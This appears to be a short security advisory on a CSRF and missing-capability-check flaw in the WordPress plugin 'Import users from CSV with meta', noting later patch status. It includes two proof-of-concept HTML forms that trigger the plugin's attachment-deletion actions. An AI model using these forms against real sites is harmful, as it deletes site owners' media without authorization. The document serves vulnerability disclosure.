Import users from CSV with meta [CSRF]


Plugin implements the following AJAX actions:

  • acui_bulk_delete_attachment
  • acui_delete_attachment

Both of them are deleting attachments from the website. None of them introduce CSRF prevention controls. This allows an attacker to leverage the CSRF vulnerability in order to delete all or selected media from the infected website.

Since there also are no capabilities checks, any authenticated user could exploit this vulnerability.


Bulk delete:
<form method="post" action="">
    <input type="hidden" name="action" value="acui_bulk_delete_attachment">
    <button type="submit" value="Submit">Submit</button>

Selective delete:
<form method="post" action="">
    <input type="hidden" name="action" value="acui_delete_attachment">
    <input type="text" name="attach_id" value="" placeholder="Attachment ID">
    <button type="submit" value="Submit">Submit</button>


Latest versions are patched regarding the acui_delete_attachment action. acui_bulk_delete_attachment appears to still be vulnerable, though it would only delete CSV files uploaded as attachments.

WordPress Plugins CSRF
  • 2017-10-03:
  • 2019-03-17:
    No longer valid (fixed in the meanwhile)